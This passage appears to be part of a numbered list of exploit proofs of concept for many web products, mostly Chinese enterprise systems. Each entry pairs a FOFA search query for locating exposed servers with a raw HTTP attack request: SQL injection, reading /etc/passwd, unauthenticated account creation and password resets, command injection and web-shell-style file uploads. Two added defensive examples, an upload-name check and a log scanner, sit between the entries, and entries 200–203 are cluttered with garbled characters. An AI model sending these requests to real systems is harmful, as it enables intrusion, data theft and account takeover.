GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Guangzhou Tuchuang) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 (SunFull) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友 (Realor) 天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON clinical browsing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Decoded, documentUniqueId is 1';WAITFOR DELAY '0:0:5'-- (MSSQL time-based blind; a vulnerable host answers about 5 seconds late).

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 (ESAFENET electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

Note: the /js/../ segment normalizes to /CDGServer3/NavigationAjax on the server; send the path exactly as shown.

192. 富通天下外贸ERP (Futong Tianxia foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

// Minimal ASP.NET handler; a successful upload of this body as a .ashx returns "test" when requested.
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

Note: the extension comes from the name query parameter (name=.ashx), not from a multipart filename.

193. 山石网科云鉴安全管理系统 (Hillstone Yunjian security management system) setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token with a fixed PHPSESSID (the same cookie is reused in step 2):
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: pass the token as token_csrf and submit the command in param. The POC writes a marker file that is then served over HTTP:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker file back; the response body should contain 23333333333456:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

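The upload entries above (192, 194, and further down 199, 202 and 203) all succeed because the server trusts the client-supplied file name. As an added example, not code from any of these products, the block below is the server-side name check a fixed upload handler needs. It applies three rules, each defeating a trick visible in the POCs: keep only the last path component (so the "../../../../../jboss/web/fe.war/hello.jsp" traversal of entry 194 cannot leave the upload directory), decide by extension against an allow-list and never by the client's Content-Type (so "11.jsp" sent as image/jpeg in 203, "tttt.php" in 199 and the bare ".ashx" of 192 are refused), and replace the client's file stem with a random one. ALLOWED_EXTENSIONS and UPLOAD_ROOT are assumptions chosen for the example; the file names in the demo are taken from the POCs plus one constructed double-extension name.

```python
"""Server-side upload name check (added example; not any product's own code)."""
import posixpath
import secrets

ALLOWED_EXTENSIONS = {".txt", ".jpg", ".jpeg", ".png", ".pdf"}   # assumed policy for the example
EXECUTABLE_EXTENSIONS = {".jsp", ".jspx", ".php", ".phtml", ".ashx", ".aspx", ".asp", ".cgi"}
UPLOAD_ROOT = "/var/app/uploads"   # assumed; must be outside the web application's own tree


def check_upload_name(client_filename):
    """Return (accepted, detail): the stored file name if accepted, else the rejection reason."""
    # Rule 1: ignore every directory component the client supplied, for both separators.
    base = client_filename.replace("\\", "/").split("/")[-1]
    stem, ext = posixpath.splitext(base)
    ext = ext.lower()
    # A bare ".ashx" (entry 192) has no stem: splitext treats the leading dot as the name.
    if not stem or stem.startswith("."):
        return False, "no usable file name"
    # Rule 2: extension allow-list. Executable extensions are named explicitly so the
    # rejection reason says why, even if ALLOWED_EXTENSIONS is widened later.
    if ext in EXECUTABLE_EXTENSIONS:
        return False, f"extension {ext} is executable"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not in allow-list"
    # Rule 3: server-chosen stem; only the allow-listed extension survives from the request.
    return True, secrets.token_hex(16) + ext


def stored_path(client_filename):
    """Full storage path for an accepted upload, or None. Re-checks containment as a guard."""
    accepted, detail = check_upload_name(client_filename)
    if not accepted:
        return None
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, detail))
    if posixpath.dirname(full) != UPLOAD_ROOT:   # cannot trigger with a random stem; kept as defence in depth
        return None
    return full


if __name__ == "__main__":
    # File names copied from the POCs in this list, plus one constructed double-extension name.
    for name in ["../../../../../jboss/web/fe.war/hello.jsp", "tttt.php", "11.jsp",
                 ".ashx", "1123.txt", "shell.php.txt"]:
        print(f"{name!r:48} -> {check_upload_name(name)}")
```

Because the stem is discarded, double-extension names such as shell.php.txt are stored as random.txt, and the declared Content-Type is deliberately never consulted: entry 203 shows why a JSP arrives labelled image/jpeg.
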
195. 飞鱼星上网行为管理系统 (Volans internet behavior management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

Note: xgh names the account and newPass the password being set; the request carries no session or token.

197. 浙大恩特客户资源管理系统 (Zheda Ente customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

Decoded, goonumStr is 1') UNION ALL SELECT 111*111-- , i.e. a union-based probe that selects 12321.

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

Decoded, sid is `ls />/www/aaa.txt` (backtick command substitution writing the listing to a web-served file). The request carries a sysauth cookie, i.e. an authenticated LuCI session.

199. Cockpit (cockpit系统) assetsmanager/upload endpoint file upload
Fofa:title="Authenticate Please!"

1. Request the login page to obtain the CSRF token (csfr), then obtain a session cookie, then upload and fetch the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with header:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Note: this step logs in with admin/admin, so the chain depends on default credentials still being in place.

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path:
/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

" ?4 t, n/ `4 p* Z201. 方正全媒体新闻采编系统 binary SQL注入
% \. b/ T, x; x0 y: XFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"2 a: i  o! p+ y: |: y( u. U0 b
POST /newsedit/newsplan/task/binary.do HTTP/1.1% u1 ?( e& }" h/ e
Content-Type: application/x-www-form-urlencoded* N& C4 b9 s# u1 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* V& z1 u& d& {* q. R  B
Accept-Encoding: gzip, deflate
# x. [, k  `+ H. }7 c: jAccept-Language: zh-CN,zh;q=0.9
$ K& r6 y( u& [  d0 s9 l, ^2 RConnection: close3 b9 {  Q' ~. `
8 a5 i2 o' R8 b
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1) M5 M7 V8 }) D" R
5 c% h8 Z% W) }  S1 J1 W6 U' i

! R( U2 S7 W2 `" ~202. 微擎系统 AccountEdit任意文件上传
9 s5 s  a, R, ^& [3 g3 bFOFA:body="/Widgets/WidgetCollection/"
: o# D, b2 M, d. ?, @# J获取__VIEWSTATE和__EVENTVALIDATION值
9 K: W6 J2 @. c7 \  Z  M$ u6 {* }/ ^GET /User/AccountEdit.aspx HTTP/1.1
# X6 r- [' S. u! KHost: 滑板人之家( j0 o3 B5 s: G% {" T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.316 T& j' K* p" ~% {/ I) J
Content-Length: 05 }* j/ k2 l; Q2 r
* u. T0 M" ~* x& ^' Y  \0 J

1 T& }& p; p* v3 o替换__VIEWSTATE和__EVENTVALIDATION值
$ Q. |5 X3 s( D  APOST /User/AccountEdit.aspx HTTP/1.1; v  ?% }7 Q% Z6 L9 B
Accept-Encoding: gzip, deflate, br
5 w* ?! R7 A9 I5 c& V8 G$ `Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356873 S3 u3 M! E. k  E5 X
  G" o4 m* H6 E+ Q% G+ _& \: E
-----------------------------786435874t38587593865736587346567358735687) T9 {$ A4 u- F  d! w, C' @
Content-Disposition: form-data; name="__VIEWSTATE"
6 i6 [3 D# }  D9 U7 E+ g
& g& j' C3 T9 v6 U__VIEWSTATE0 n6 e/ ?0 D& z2 _- u8 I% e4 t
-----------------------------786435874t38587593865736587346567358735687
! Z6 T! U- k& \! D: S1 |1 l2 {2 u1 `Content-Disposition: form-data; name="__EVENTVALIDATION"
! ?# q) @( F6 M5 h1 w# l  p; F& @4 x/ c" r# E9 M/ n
__EVENTVALIDATION4 V6 S# S2 x! @+ D" @9 R
-----------------------------786435874t38587593865736587346567358735687
: b! V; L- _3 C6 m0 C1 wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"+ J: ?( I' h$ F8 |6 h8 f( ]8 z2 m
Content-Type: text/plain
6 w0 x5 p2 j4 _/ V  K5 u, R+ ^3 {, v# i1 W# j0 G. E0 S. m5 ~& o
Hello World!
  p. C+ y/ V8 O1 U4 j-----------------------------786435874t38587593865736587346567358735687- f4 L' i* t# z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
, r0 I, n# e$ b- X$ {8 ~$ T3 A; y2 }3 c4 t) E5 v
上传图片
! M8 F  r( }1 @) n1 u& i+ e$ d-----------------------------786435874t38587593865736587346567358735687
: ^1 V% ~- {6 b- Q' BContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"* V+ Y$ U* P3 d* P& e

; W! a' \6 L( t+ F6 Y; G  ?* B) u  P$ {6 M) d$ m- D4 y( p8 ~6 _+ d
-----------------------------786435874t38587593865736587346567358735687
7 U9 \+ j( C5 k, o7 m* ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
* s$ P, H  Z3 C3 E  a' i' q2 w( c9 m9 N  J5 e+ H0 S, {

8 f- z9 s& }% a% X3 J-----------------------------786435874t38587593865736587346567358735687--
  u) x' C1 Z: q. ~0 }% b
3 Q2 ?* ?* p6 q% X# k9 O( ]( p% l, f( p
/_data/Uploads/1123.txt
7 b$ L# ?( y: Y, y2 k: B) k
203. 红海云EHR (Redsea Cloud EHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

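The post says its purpose is to let defenders check exposure. As an added example for that use, not part of the original list, the block below scans web-server access logs (combined log format) for the request paths of entries 186 to 203 above and for the payload fragments that appear in their query strings (SLEEP(, WAITFOR DELAY, RANDOMBLOB(, /etc/passwd, file://, backtick substitution). The signature list is assembled from the POCs on this page; the log lines are constructed samples, not real traffic. One caveat it makes explicit: access logs do not record POST bodies, so for the POST-only entries (186, 187, 191, 201 and the uploads) a hit only says the endpoint was reached, and you need WAF or request-body logging to see what was sent.

```python
"""Scan combined-format access logs for the POC request signatures listed above.

Added example for defenders, not code from the original post. Signatures come from the
request lines of entries 186-203; SAMPLE_LOG is constructed, not captured traffic.
"""
import re
from urllib.parse import unquote_plus

# (label, required HTTP method or None, lowercase substring of the URL-decoded request target)
PATH_SIGNATURES = [
    ("186 pr_monitor getting_index_data.php SQLi", None, "/admin/pr_monitor/getting_index_data.php"),
    ("187 Mura CMS processAsyncObject SQLi (CVE-2024-32640)", None, "method=processasyncobject"),
    ("188 Jiahui attachment file read", None, "/attachment?file="),
    ("189 LANWON deleteStudy SQLi", None, "/xds/deletestudy.php"),
    ("190 poihuoqu file read", None, "/admin/userinfo/poihuoqu"),
    ("191 ESAFENET NavigationAjax SQLi", None, "navigationajax"),
    ("192 Futong ERP UploadEmailAttr upload", None, "/joinfapp/email/uploademailattr"),
    ("193 Hillstone setSystemTimeAction RCE", None, "/master/ajaxactions/setsystemtimeaction.php"),
    ("194 FE uploadAttachmentServlet upload", None, "/servlet/uploadattachmentservlet"),
    ("195 Volans send_order.cgi RCE", None, "/send_order.cgi"),
    ("196 Fengsu resetPasswordBySuper", None, "/cas/userctl/resetpasswordbysuper"),
    ("197 Ente Quotegask_editAction SQLi", None, "quotegask_editaction.entweb"),
    ("198 aliyundrive-webdav RCE (CVE-2024-29640)", None, "/aliyundrive-webdav/query"),
    ("199 Cockpit assetsmanager upload", "POST", "/assetsmanager/upload"),
    ("200 SeaCMS dmku SQLi", None, "/dmplayer/dmku/"),
    ("201 Founder binary.do SQLi", None, "/newsedit/newsplan/task/binary.do"),
    ("202 AccountEdit.aspx upload", "POST", "/user/accountedit.aspx"),  # GET is a normal page view
    ("203 Redsea PtFjk upload", None, "/redseaplatform/ptfjk.mob"),
]

# Payload fragments seen in the query strings above, grouped by technique.
PAYLOAD_MARKERS = {
    "time-based SQLi": ("sleep(", "waitfor delay", "randomblob("),
    "union SQLi": ("union all select", "union select"),
    "file read": ("/etc/passwd", "file://"),
    "command injection": ("`", "uname -a", "os.system("),
}

# Apache/Nginx combined log: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(method, target):
    """Return (matched entry labels, matched marker names) for one request target."""
    decoded = unquote_plus(target).lower()   # one decoding pass; lowercase for case-insensitive paths
    entries = [label for label, req_method, needle in PATH_SIGNATURES
               if needle in decoded and (req_method is None or req_method == method)]
    markers = [name for name, needles in PAYLOAD_MARKERS.items()
               if any(n in decoded for n in needles)]
    return entries, markers


def scan_log(lines):
    """Return one finding per log line whose request matches a POC path or payload marker."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue   # not combined format; skip rather than guess at fields
        entries, markers = classify_request(m["method"], m["target"])
        if entries or markers:
            findings.append({
                "line": lineno, "ip": m["ip"], "time": m["ts"], "method": m["method"],
                "target": m["target"], "status": int(m["status"]),
                "entries": entries, "markers": markers,
            })
    return findings


# Constructed sample log (not real traffic); request targets copied from the POCs above.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2024:10:00:01 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:10:00:02 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1837 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:10:00:03 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:10:00:04 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Jun/2024:10:00:05 +0800] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Jun/2024:10:00:06 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%60 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']}: {f['ip']} {f['method']} {f['target']} -> {f['entries'] or f['markers']}")
```

Run it over a real log with `scan_log(open("access.log").readlines())`. A 200 response to one of these paths is worth more attention than a 404, and a time-based SQLi marker is best confirmed against the request duration field if your log format records one.
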